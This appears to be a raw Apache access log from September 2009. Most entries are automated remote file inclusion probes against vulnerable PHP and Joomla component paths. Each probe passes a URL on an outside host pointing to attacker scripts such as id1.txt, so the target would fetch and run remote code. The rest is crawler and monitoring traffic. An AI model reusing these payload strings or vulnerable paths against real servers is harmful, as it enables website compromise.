207.58.163.86 - - [04/Sep/2009:01:35:37 -0400] "GET /logs/access_log.Q109071900//include/mail.inc.php?skin_board_path=http://arsitektur.freehostia.com/dokumen/irc/scan/rfi/AinuLid1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
207.58.163.86 - - [04/Sep/2009:01:35:38 -0400] "GET /logs/access_log.Q109081200//include/mail.inc.php?skin_board_path=http://arsitektur.freehostia.com/dokumen/irc/scan/rfi/AinuLid1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:01:35:42 -0400] "GET /logs/dministrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:01:35:42 -0400] "GET /dministrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:01:35:42 -0400] "GET /logs/access_log.Q109052600%20%20/dministrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:01:35:43 -0400] "GET /logs/access_log.Q109081000%20%20/dministrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:01:35:46 -0400] "GET /dministrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:01:35:46 -0400] "GET /logs/dministrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:01:35:46 -0400] "GET /logs/access_log.Q109081000%20%20/dministrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:01:35:46 -0400] "GET /logs/access_log.Q109081300%20%20/dministrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:01:35:53 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:01:35:53 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:01:35:53 -0400] "GET /logs/access_log.Q109071700%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:01:35:54 -0400] "GET /logs/access_log.Q109062100%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:01:35:54 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:01:35:54 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:01:35:54 -0400] "GET /logs/access_log.Q109071700%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:01:35:57 -0400] "GET /logs/access_log.Q109062100%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
211.110.11.75 - - [04/Sep/2009:01:36:04 -0400] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.110.11.75 - - [04/Sep/2009:01:36:04 -0400] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.110.11.75 - - [04/Sep/2009:01:36:04 -0400] "GET /logs/access_log.Q109052500/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
211.110.11.75 - - [04/Sep/2009:01:36:15 -0400] "GET /logs/access_log.Q109063000/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
66.235.124.7 - - [04/Sep/2009:01:37:14 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
66.235.124.7 - - [04/Sep/2009:01:37:44 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS%20(S0040):0 HTTP/1.1" 200 69459 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
218.38.136.251 - - [04/Sep/2009:01:37:46 -0400] "GET /logs/access_log.Q109040400/dministrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:01:37:48 -0400] "GET /logs/access_log.Q109040400/dministrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:01:38:05 -0400] "GET /logs/error_log.Q109040400/dministrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:01:38:20 -0400] "GET /logs/error_log.Q109052600/dministrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:01:39:04 -0400] "GET /logs/error_log.Q109040400/dministrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:01:39:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.1.246.2 - - [04/Sep/2009:01:39:36 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
124.1.246.2 - - [04/Sep/2009:01:39:36 -0400] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:01:40:07 -0400] "GET /logs/access_log.Q109061000%20%20/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???%20? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:01:40:07 -0400] "GET /logs/access_log.Q109061800%20%20/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???%20? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
211.110.11.75 - - [04/Sep/2009:01:40:10 -0400] "GET /logs/access_log.Q109052500%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
76.93.103.36 - - [04/Sep/2009:01:40:17 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.103.36 - - [04/Sep/2009:01:40:17 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.103.36 - - [04/Sep/2009:01:40:17 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.103.36 - - [04/Sep/2009:01:40:17 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
211.110.11.75 - - [04/Sep/2009:01:40:29 -0400] "GET /logs/access_log.Q109062300%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
124.1.246.2 - - [04/Sep/2009:01:41:08 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
124.1.246.2 - - [04/Sep/2009:01:41:08 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
124.1.246.2 - - [04/Sep/2009:01:41:08 -0400] "GET /logs/access_log.Q109061000%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
124.1.246.2 - - [04/Sep/2009:01:41:10 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
124.1.246.2 - - [04/Sep/2009:01:41:10 -0400] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
74.6.22.87 - - [04/Sep/2009:01:41:28 -0400] "GET /scripts/mydata.js HTTP/1.0" 200 5585 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [04/Sep/2009:01:44:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.230 - - [04/Sep/2009:01:44:18 -0400] "GET /logs/access_log.Q109060300 HTTP/1.1" 200 3991095 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
78.111.80.234 - - [04/Sep/2009:01:46:13 -0400] "GET /logs/access_log.Q109060300%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.b92.net/system/files/id1.txt???%20? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:01:46:13 -0400] "GET /logs/access_log.Q109071000%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.b92.net/system/files/id1.txt???%20? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
195.210.57.83 - - [04/Sep/2009:01:46:27 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; KaloogaBot; http://www.kalooga.com/info.html?page=crawler)"
195.210.57.83 - - [04/Sep/2009:01:46:28 -0400] "GET /logs/access_log.Q108052300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; KaloogaBot; http://www.kalooga.com/info.html?page=crawler)"
124.1.246.2 - - [04/Sep/2009:01:47:06 -0400] "GET //%5Cecommerce%5Cpapyment%5Ccybersource.php?path[docroot]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
124.1.246.2 - - [04/Sep/2009:01:47:06 -0400] "GET /logs//%5Cecommerce%5Cpapyment%5Ccybersource.php?path[docroot]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
124.1.246.2 - - [04/Sep/2009:01:47:06 -0400] "GET /logs/access_log.Q109061000%20%20//%5Cecommerce%5Cpapyment%5Ccybersource.php?path[docroot]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:01:47:40 -0400] "GET /logs/access_log.Q109060300%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???%20? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:01:47:40 -0400] "GET /logs/access_log.Q109071000%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???%20? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.234.2.107 - - [04/Sep/2009:01:48:14 -0400] "GET /logs/access_log.Q109050300/?_SERVER[DOCUMENT_ROOT]=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
222.234.2.107 - - [04/Sep/2009:01:48:14 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
222.234.2.107 - - [04/Sep/2009:01:48:14 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 200 16426 "-" "Mozilla/5.0"
222.234.2.107 - - [04/Sep/2009:01:48:28 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
222.234.2.107 - - [04/Sep/2009:01:48:28 -0400] "GET /logs/access_log.Q109050300/?_SERVER[DOCUMENT_ROOT]=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
222.234.2.107 - - [04/Sep/2009:01:48:28 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.sportime.co.kr/spboard/skin/happycast_blue/fx29id.txt???? HTTP/1.1" 200 16426 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:01:49:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.22.87 - - [04/Sep/2009:01:50:06 -0400] "GET /logs/access_log.Q109090300 HTTP/1.0" 200 5190518 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
77.221.130.31 - - [04/Sep/2009:01:51:03 -0400] "GET //tools/send_reminders.php?includedir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
77.221.130.31 - - [04/Sep/2009:01:51:05 -0400] "GET //tools/send_reminders.php?includedir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
77.221.130.31 - - [04/Sep/2009:01:51:11 -0400] "GET /logs//tools/send_reminders.php?includedir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
77.221.130.31 - - [04/Sep/2009:01:51:11 -0400] "GET /logs//tools/send_reminders.php?includedir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
207.58.163.86 - - [04/Sep/2009:01:54:52 -0400] "GET /send_reminders.php?includedir=http://arsitektur.freehostia.com/dokumen/irc/scan/rfi/AinuLid1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
207.58.163.86 - - [04/Sep/2009:01:54:52 -0400] "GET /logs/send_reminders.php?includedir=http://arsitektur.freehostia.com/dokumen/irc/scan/rfi/AinuLid1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
207.58.163.86 - - [04/Sep/2009:01:54:52 -0400] "GET /logs/access_log.Q109060600%20%20/send_reminders.php?includedir=http://arsitektur.freehostia.com/dokumen/irc/scan/rfi/AinuLid1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
77.221.130.31 - - [04/Sep/2009:01:54:58 -0400] "GET //tools/send_reminders.php?includedir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
77.221.130.31 - - [04/Sep/2009:01:54:58 -0400] "GET /logs//tools/send_reminders.php?includedir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
207.58.163.86 - - [04/Sep/2009:01:55:14 -0400] "GET /logs/access_log.Q109070300%20%20/send_reminders.php?includedir=http://arsitektur.freehostia.com/dokumen/irc/scan/rfi/AinuLid1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
62.128.135.52 - - [04/Sep/2009:01:56:44 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
222.236.47.182 - - [04/Sep/2009:01:57:00 -0400] "GET ///vwar/backup/errors.php?error=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
222.236.47.182 - - [04/Sep/2009:01:57:00 -0400] "GET /logs///vwar/backup/errors.php?error=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.236.47.182 - - [04/Sep/2009:01:57:00 -0400] "GET /logs/access_log.Q109061000///vwar/backup/errors.php?error=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
222.236.47.182 - - [04/Sep/2009:01:57:02 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.sh1908.org//selah/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.236.47.182 - - [04/Sep/2009:01:57:02 -0400] "GET ///vwar/backup/errors.php?error=http://www.sh1908.org//selah/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
222.236.47.182 - - [04/Sep/2009:01:57:02 -0400] "GET /logs/access_log.Q109061000///vwar/backup/errors.php?error=http://www.sh1908.org//selah/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
207.58.163.86 - - [04/Sep/2009:01:57:26 -0400] "GET /logs/access_log.Q109060600/send_reminders.php?includedir=http://arsitektur.freehostia.com/dokumen/irc/scan/rfi/AinuLid1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
207.58.163.86 - - [04/Sep/2009:01:57:36 -0400] "GET /logs/access_log.Q109070300/send_reminders.php?includedir=http://arsitektur.freehostia.com/dokumen/irc/scan/rfi/AinuLid1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
94.23.212.189 - - [04/Sep/2009:01:57:50 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
222.122.72.216 - - [04/Sep/2009:02:00:48 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.122.72.216 - - [04/Sep/2009:02:00:48 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.72.216 - - [04/Sep/2009:02:00:48 -0400] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
222.122.72.216 - - [04/Sep/2009:02:01:17 -0400] "GET /logs/access_log.Q109062400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
216.120.237.150 - - [04/Sep/2009:02:01:37 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 207 "-" "libwww-perl/5.831"
78.111.80.234 - - [04/Sep/2009:02:03:34 -0400] "GET /includes/functions_admin.php?phpbb_root_path=http://www.b92.net/system/files/id1.txt???%20? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:02:03:34 -0400] "GET /logs/access_log.Q109061900%20%20/includes/functions_admin.php?phpbb_root_path=http://www.b92.net/system/files/id1.txt???%20? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:02:03:34 -0400] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://www.b92.net/system/files/id1.txt???%20? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:02:03:34 -0400] "GET /logs/access_log.Q109062900%20%20/includes/functions_admin.php?phpbb_root_path=http://www.b92.net/system/files/id1.txt???%20? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.122.72.216 - - [04/Sep/2009:02:03:36 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.122.72.216 - - [04/Sep/2009:02:03:36 -0400] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
222.122.72.216 - - [04/Sep/2009:02:03:36 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.72.216 - - [04/Sep/2009:02:03:37 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.72.216 - - [04/Sep/2009:02:03:37 -0400] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
222.122.72.216 - - [04/Sep/2009:02:03:37 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.122.72.216 - - [04/Sep/2009:02:03:38 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.72.216 - - [04/Sep/2009:02:03:38 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.122.72.216 - - [04/Sep/2009:02:03:38 -0400] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
222.122.72.216 - - [04/Sep/2009:02:04:05 -0400] "GET /logs/access_log.Q109062400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
222.122.72.216 - - [04/Sep/2009:02:04:06 -0400] "GET /logs/access_log.Q109062400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
222.122.72.216 - - [04/Sep/2009:02:04:07 -0400] "GET /logs/access_log.Q109062400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
119.63.193.55 - - [04/Sep/2009:02:04:09 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
67.15.48.60 - - [04/Sep/2009:02:07:00 -0400] "GET /logs/access_log.Q109062300/lostpasswd.php?env[include_prefix]=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.810"
67.15.48.60 - - [04/Sep/2009:02:07:00 -0400] "GET /logs/error_log.Q109062300/lostpasswd.php?env[include_prefix]=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.810"
67.15.48.60 - - [04/Sep/2009:02:07:00 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 217 "-" "libwww-perl/5.810"
67.15.48.60 - - [04/Sep/2009:02:07:01 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
62.128.135.52 - - [04/Sep/2009:02:08:48 -0400] "GET /logs/error_log.Q109080200/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
62.128.135.52 - - [04/Sep/2009:02:08:49 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
62.128.135.52 - - [04/Sep/2009:02:08:49 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
209.59.12.99 - - [04/Sep/2009:02:09:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
